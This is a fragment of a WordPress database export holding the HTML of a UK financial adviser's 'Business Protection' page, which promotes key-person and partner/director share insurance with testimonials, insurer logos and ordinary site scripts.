data-endelementdelay=\"0\" data-endspeed=\"300\" style=\"z-index: 3; max-width: auto; max-height: auto; white-space: nowrap;\">Is a key person the only thing keeping<br/> your business in the black&#13;\n		</div>&#13;\n	</li>&#13;\n</ul><div class=\"tp-bannertimer\"/>	</div>&#13;\n</div>			&#13;\n			<script type=\"text/javascript\"><![CDATA[\r\n\r\n				var tpj=jQuery;				\r\n				tpj.noConflict();				\r\n				var revapi38;\r\n				\r\n				tpj(document).ready(function() {\r\n								\r\n				if(tpj(\'#rev_slider_38_1\').revolution == undefined)\r\n					revslider_showDoubleJqueryError(\'#rev_slider_38_1\');\r\n				else\r\n				   revapi38 = tpj(\'#rev_slider_38_1\').show().revolution(\r\n					{\r\n						dottedOverlay:\"none\",\r\n						delay:9000,\r\n						startwidth:960,\r\n						startheight:280,\r\n						hideThumbs:200,\r\n						\r\n						thumbWidth:100,\r\n						thumbHeight:50,\r\n						thumbAmount:1,\r\n						\r\n						navigationType:\"bullet\",\r\n						navigationArrows:\"solo\",\r\n						navigationStyle:\"round\",\r\n						\r\n						touchenabled:\"on\",\r\n						onHoverStop:\"on\",\r\n						\r\n						swipe_velocity: 0.7,\r\n						swipe_min_touches: 1,\r\n						swipe_max_touches: 1,\r\n						drag_block_vertical: false,\r\n												\r\n						keyboardNavigation:\"off\",\r\n						\r\n						navigationHAlign:\"center\",\r\n						navigationVAlign:\"bottom\",\r\n						navigationHOffset:0,\r\n						navigationVOffset:20,\r\n\r\n						soloArrowLeftHalign:\"left\",\r\n						soloArrowLeftValign:\"center\",\r\n						soloArrowLeftHOffset:20,\r\n						soloArrowLeftVOffset:0,\r\n\r\n						soloArrowRightHalign:\"right\",\r\n						soloArrowRightValign:\"center\",\r\n						soloArrowRightHOffset:20,\r\n						soloArrowRightVOffset:0,\r\n								\r\n						shadow:2,\r\n						fullWidth:\"off\",\r\n						fullScreen:\"off\",\r\n\r\n						spinner:\"spinner0\",\r\n						\r\n						stopLoop:\"off\",\r\n						stopAfterLoops:-1,\r\n						stopAtSlide:-1,\r\n\r\n						\r\n						shuffle:\"off\",\r\n						\r\n												\r\n												\r\n												\r\n												\r\n												\r\n						hideThumbsOnMobile:\"off\",\r\n						hideNavDelayOnMobile:1500,						hideBulletsOnMobile:\"off\",\r\n						hideArrowsOnMobile:\"off\",\r\n						hideThumbsUnderResolution:0,\r\n						\r\n						hideSliderAtLimit:0,\r\n						hideCaptionAtLimit:0,\r\n						hideAllCaptionAtLilmit:0,\r\n						startWithSlide:0,\r\n						videoJsPath:\"http://www.equalitywalk.org.uk/wp-content/plugins/revslider/rs-plugin/videojs/\",\r\n						fullScreenOffsetContainer: \"\"	\r\n					});\r\n				\r\n				});	//ready\r\n				\r\n			]]></script><!-- END REVOLUTION SLIDER --></div>&#13;\n		&#13;\n																<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n			<div id=\"content\" style=\"width:100%\">&#13;\n				<div id=\"post-7189\" class=\"post-7189 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Business Protection</span>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n			<span class=\"updated\" style=\"display: none;\">2017-12-02T10:08:38+00:00</span>&#13;\n																								<div class=\"post-content\">&#13;\n				<div id=\"\" class=\"fullwidth-box\" style=\"background-color:#ffffff;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:0px;padding-bottom:20;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\">&#13;\n<h1 style=\"text-align: center;\">Business Protection</h1>&#13;\n<h3 style=\"text-align: center;\">1 in 10 business owners would expect their business to stop trading right away if a key person died, and 61%<sup>2</sup> say that losing a key person would have a major  impact on their business&#13;\n<div class=\"clearboth\"/><div class=\"demo-sep sep-double\" style=\"margin-top:20px;margin-bottom:20px;\"/><div class=\"one_half\"> <style type=\"text/css\"><![CDATA[#reading-box-container-1 .tagline-shadow:before,#reading-box-container-1 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-1\"><section class=\"reading-box \" style=\"background-color:#f6f6f6 !important;border-width:1px;border-color:#f6f6f6!important;border-left-width:3px !important;border-left-color:#afd9a5!important;border-style:solid;\"><h2>Business Protection - We Make it Simple</h2><p/>&#13;\n<p>Our Aim - to protect your business should a key person, partner or director die or contract a critical illness ensuring that your business can continue trading in these circumstances.</p>&#13;\n<p>Running a business always involves an element of uncertainty. Premises can be rebuilt, plant or products replaced, but the recovery of a person is not nearly as clear cut, regardless of whether that person is an employee or the owner.</p>&#13;\n<p> </p>&#13;\n<p>There are no guarantees that someone who has suffered a major health crisis will be able to perform at the same level as previously or even return to work. That’s why it’s especially important that critical illness cover, as well as life cover, is in place to help ensure that the business can cope with the loss.</p>&#13;\n<p> </p>&#13;\n<p>We’re dedicated to helping you make the right life insurance choices. Not the best choice for us, or the most expensive – simply the best choice for you and your unique circumstances.</p>&#13;\n<p> </p>&#13;\n<p>Our advice is honest, frank and regulated for your reassurance – whether you buy from us or not, we want to leave you feeling more in control of your options.</p>&#13;\n<p> </p>&#13;\n<p/></section></div></div><div class=\"one_half last\"><div class=\"accordian\"><h5 class=\"toggle active\"><a href=\"#\"><span class=\"arrow\"/>How we will help you make the Life Insurance choices</a></h5><div class=\"toggle-content default-open\" style=\"display: block;\">&#13;\n<p><b>Right Cover<br/></b>Lump sum or regular income? Not too much or too little, we’ll find you the cover to suit your situation and your budget?<!--?xml:namespace prefix = \"o\" ns = \"urn:schemas-microsoft-com:office:office\" /--></p>&#13;\n<p><b>Better Prices</b><br/>&#13;\nWe’ll save on your premiums, but we don’t just hide behind a marked down price. Our discounts are always on the right insurance policy for you.</p>&#13;\n<p><b>Better Small Print</b><br/>&#13;\nAs we’ve said already, life insurance simply has to pay out. We maximise your chances by reducing or mitigating any exclusions from your policy.</p>&#13;\n</div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>What is Partner/Director Share Protection</a></h5><div class=\"toggle-content \" style=\"display: none;\">&#13;\n<p>The loss of a partner or director may destabilise the business and can quickly lead to financial difficulties. Partner/Director Share Protection means if the worst does happen, the remaining directors or partners can stay in control of the business.</p></div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>Our Promise</a></h5><div class=\"toggle-content \" style=\"display: none;\">We stand for honesty – advice – trust and value. Our culture and people matter and promise you this, the team that makes Equity SMART work will be centred on you. Our team believe in treating clients like family, so you can be confident that we’ll give you the same advice we would give to our own relatives.</div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>Our Insurance Philosophy</a></h5><div class=\"toggle-content \" style=\"display: none;\">We believe in a “Get Rich Slowly” philosophy through a “passive investment” approach to purchasing investments. This we believe is the right choice for the majority of investors who are seeking more peace of mind, when looking to achieve sustained performance over the longer term.&#13;\n<ul><li>Passive investment is the rational, mathematically proven route to investing success.</li>&#13;\n<li>Our investment strategies are focused on your risk profile, well researched, efficient and low maintenance.</li>&#13;\n<li>We look to keep your costs low through longer term appreciation, reduced maintenance and look to avoid unnecessary trading.</li>&#13;\n<li>Ensure you are not over exposed at any time through wide diversification of your asset classes.</li>&#13;\n<li>We provide regular reviews and rebalancing when required or on a 6 monthly or yearly basis.</li>&#13;\n</ul></div></div> <div class=\"clearboth\"/><div class=\"demo-sep sep-none\" style=\"margin-top:18px;\"/><a class=\"button-1 button large e.g. green\" title=\"\" href=\"../contact-us/\" target=\"\">Click For A Free Business Protection Review</a></div><div class=\"clearboth\"/> </h3></div></div> <div id=\"\" class=\"fullwidth-box\" style=\"background-color:#ffffff;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:15px;padding-bottom:0;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\"> <div class=\"title\"><h2>Kind Words &amp; Praise</h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <div class=\"one_half\"> <style type=\"text/css\"><![CDATA[\r\n		#testimonials-1 q{background-color:#f6f6f6 !important;color:#747474 !important;}\r\n		#testimonials-1 .review blockquote div:after{border-top-color:#f6f6f6 !important;}\r\n		]]></style><div id=\"testimonials-1\" class=\"reviews clearfix\"/> <div class=\"review male\"><blockquote><q>“Very pleased with the service provided. Highly professional and standard of information provided was very comprehensive. I was kept informed at all stages of the process.”</q><div class=\"clearfix\"><span class=\"company-name\">Stephen McCoy</span></div></blockquote></div></div> <div class=\"one_half last\"><style type=\"text/css\"><![CDATA[\r\n		#testimonials-2 q{background-color:#f6f6f6 !important;color:#747474 !important;}\r\n		#testimonials-2 .review blockquote div:after{border-top-color:#f6f6f6 !important;}\r\n		]]></style><div id=\"testimonials-2\" class=\"reviews clearfix\"> <div class=\"review male\"><blockquote><q>“I found the staff who I personally dealt with very friendly helpful and professional and the people on the other side of the phone exceptionally friendly too.”</q><div class=\"clearfix\"><span class=\"company-name\">M Patterson</span></div></blockquote></div> </div> </div><div class=\"clearboth\"/>&#13;\n<p>We Compare All The Leading Insurance. Here are a Few You Might Recognise:</p>&#13;\n<div class=\"images-carousel-container related-posts related-projects \"><div id=\"carousel\" class=\"clients-carousel es-carousel-wrapper\"><div class=\"es-carousel\"><ul><li><a href=\"../wp-content/uploads/2013/05/axa.jpg\" target=\"\" title=\"\"><img src=\"../wp-content/uploads/2013/05/axa.jpg\" alt=\"\"/></a></li><li><a href=\"../wp-content/uploads/2013/05/aegon.jpg\" target=\"\" title=\"\"><img src=\"../wp-content/uploads/2013/05/aegon.jpg\" alt=\"\"/></a></li><li><a href=\"../wp-content/uploads/2013/05/aviva.jpg\" target=\"\" title=\"\"><img src=\"../wp-content/uploads/2013/05/aviva.jpg\" alt=\"\"/></a></li><li><a href=\"../wp-content/uploads/2013/05/friendslife.jpg\" target=\"\" title=\"\"><img src=\"../wp-content/uploads/2013/05/friendslife.jpg\" alt=\"\"/></a></li><li><a href=\"../wp-content/uploads/2013/05/Standard_Life_logo1.png\" target=\"\" title=\"\"><img src=\"../wp-content/uploads/2013/05/Standard_Life_logo1.png\" alt=\"\"/></a></li><li><a href=\"../wp-content/uploads/2013/05/legal-and-general.gif\" target=\"\" title=\"\"><img src=\"../wp-content/uploads/2013/05/legal-and-general.gif\" alt=\"\"/></a></li><li><a href=\"../wp-content/uploads/2013/05/prudential.jpg\" target=\"\" title=\"\"><img src=\"../wp-content/uploads/2013/05/prudential.jpg\" alt=\"\"/></a></li></ul><div class=\"es-nav\"><span class=\"es-nav-prev\">Previous</span><span class=\"es-nav-next\">Next</span></div></div></div></div></div></div> <div id=\"\" class=\"fullwidth-box\" style=\"background-color:#ffffff;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:20px;padding-bottom:20px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\"><style type=\"text/css\"><![CDATA[#reading-box-container-2 .tagline-shadow:before,#reading-box-container-2 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-2\"><section class=\"reading-box tagline-shadow\" style=\"background-color:#fafafa !important;border-width:0px;border-color:#f6f6f6!important;border-left-width:3px !important;border-left-color:#afd9a5!important;border-style:solid;\"><a href=\"http://www.equalitywalk.org.uk/contact-us/\" target=\"\" class=\"continue button large default\">Book Now</a><h2>It’s all so simple. To book a chat with our business protection experts, click the link.</h2><p>It\'s free, and we think you\'ll like what you hear.</p><a href=\"../contact-us/\" target=\"\" class=\"continue mobile-button button large default\">Book Now</a></section></div></div></div>&#13;\n							</div>&#13;\n																	</div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"display:none\"><div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>subscribers who get new content from us on a monthly basis</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../new-individual-savings-accounts/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts/\">The New Individual Savings Accounts</a>&#13;\n									<div class=\"meta\">&#13;\n										May 14th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../get-auto-enrolment/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../get-auto-enrolment/\">How To Get The Most From Auto-Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										May 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../may-2014-stock-market-bulletin/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../may-2014-stock-market-bulletin/\">May 2017 Stock Market Bulletin</a>&#13;\n									<div class=\"meta\">&#13;\n										May 7th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../bank-left-stranded-without-financial-adviser/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../bank-left-stranded-without-financial-adviser/\">Has Your Bank Left You Stranded Without a Financial Adviser</a>&#13;\n									<div class=\"meta\">&#13;\n										April 7th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../april-2014-stock-market-bulletin/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../april-2014-stock-market-bulletin/\">April 2017 Stock Market Bulletin</a>&#13;\n									<div class=\"meta\">&#13;\n										April 2nd, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (1)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (3)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (7)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"1\">Wealth Management  (16)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>&#13;\n		</div></div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-4\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"../new-individual-savings-accounts/\">The New Individual Savings Accounts</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../get-auto-enrolment/\">How To Get The Most From Auto-Enrolment</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../may-2014-stock-market-bulletin/\">May 2017 Stock Market Bulletin</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../bank-left-stranded-without-financial-adviser/\">Has Your Bank Left You Stranded Without a Financial Adviser</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>Established for over 20 years we work with individuals, families and owner managed businesses countrywide, helping them organise; plan; protect and achieve the future they choose, through \"hands on\" objective and realistic financial advice they can depend on.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-22\" class=\"footer-widget-col widget_text\"><p>Download FREE Guides</p>			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/1435eb973f72a2%3A125d9572eb46dc/5753952654065664/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../w3QPpbD3DJXcyqPrBaexcUOnTpQKlOX0XuzNYejlD3Hwl1wrM5qbyjoyp4eUJt-wEdlJsAojFjru39Y0ZjrDnA_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-689.js\"/></div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col last\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"social_links-widget-3\" class=\"footer-widget-col social_links\"><p>Connect With Us</p>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul><div style=\"clear:both;\"/></div>				</article></section></div>&#13;\n	</footer><footer id=\"footer\"/></div><!-- wrapper -->&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/><script type=\"text/javascript\" src=\"../scripts.hellobar.com/565e6e29d8b6bfca77549154aee8b14f23536824.js\"/></body>','Business Protection','','publish','closed','closed','','business-protection','','','2017-09-21 16:59:30','2017-09-21 16:59:30','',0,'http://www.equalitywalk.org.uk/business-protection',0,'page','',0),(58,1,'2017-09-21 16:34:27','2017-09-21 16:34:27','<body class=\"single single-post postid-776 single-format-standard light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"navigation\" class=\"menu\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27\"><a href=\"../pensions/\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\">Pension Transfer</a></li>&#13;\n	<li 